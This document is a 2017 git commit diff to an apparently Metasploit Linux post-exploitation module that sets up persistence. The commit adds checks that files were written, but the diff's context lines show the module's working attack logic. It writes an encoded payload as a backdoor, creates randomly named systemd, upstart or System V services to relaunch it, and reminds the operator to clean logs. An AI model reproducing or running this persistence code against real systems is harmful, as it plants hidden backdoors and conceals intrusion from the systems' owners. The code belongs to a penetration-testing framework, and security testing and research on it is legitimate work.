adds check on service writing before running it

h00die · h00die · commit f98b40d0380b · 2017-05-30T22:14:49.000-04:00
diff --git a/modules/exploits/linux/local/service_persistence.rb b/modules/exploits/linux/local/service_persistence.rb
@@ -81,6 +81,9 @@ def initialize(info = {})
 
   def exploit
     backdoor = write_shell(datastore['SHELLPATH'])
+    if backdoor.nil?
+      return
+    end
     path = backdoor.split('/')[0...-1].join('/')
     file = backdoor.split('/')[-1]
     case target.name
@@ -120,8 +123,13 @@ def write_shell(path)
     backdoor = "#{path}/#{file_name}"
     vprint_status("Writing backdoor to #{backdoor}")
     write_file(backdoor, payload.encoded)
-    cmd_exec("chmod 711 #{backdoor}")
-    backdoor
+    if file_exist?(backdoor)
+      cmd_exec("chmod 711 #{backdoor}")
+      backdoor
+    else
+      print_error('File not written, check permissions.')
+      return
+    end
   end
 
   def systemd(backdoor_path, backdoor_file)
@@ -141,6 +149,10 @@ def systemd(backdoor_path, backdoor_file)
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
     vprint_status("Writing service: /lib/systemd/system/#{service_filename}.service")
     write_file("/lib/systemd/system/#{service_filename}.service", script)
+    if !file_exist?(backdoor)
+      print_error('File not written, check permissions.')
+      return
+    end
     vprint_status('Enabling service')
     cmd_exec("systemctl enable #{service_filename}.service")
     vprint_status('Starting service')
@@ -164,6 +176,10 @@ def upstart(backdoor_path, backdoor_file, runlevel)
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
     vprint_status("Writing service: /etc/init/#{service_filename}.conf")
     write_file("/etc/init/#{service_filename}.conf", script)
+    if !file_exist?(backdoor)
+      print_error('File not written, check permissions.')
+      return
+    end
     vprint_status('Starting service')
     cmd_exec("initctl start #{service_filename}")
     vprint_status("Dont forget to clean logs: /var/log/upstart/#{service_filename}.log")
@@ -269,6 +285,10 @@ def system_v(backdoor_path, backdoor_file, runlevel, has_updatercd)
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
     vprint_status("Writing service: /etc/init.d/#{service_filename}")
     write_file("/etc/init.d/#{service_filename}", script)
+    if !file_exist?(backdoor)
+      print_error('File not written, check permissions.')
+      return
+    end
     cmd_exec("chmod 755 /etc/init.d/#{service_filename}")
     vprint_status('Enabling & starting our service')
     if has_updatercd
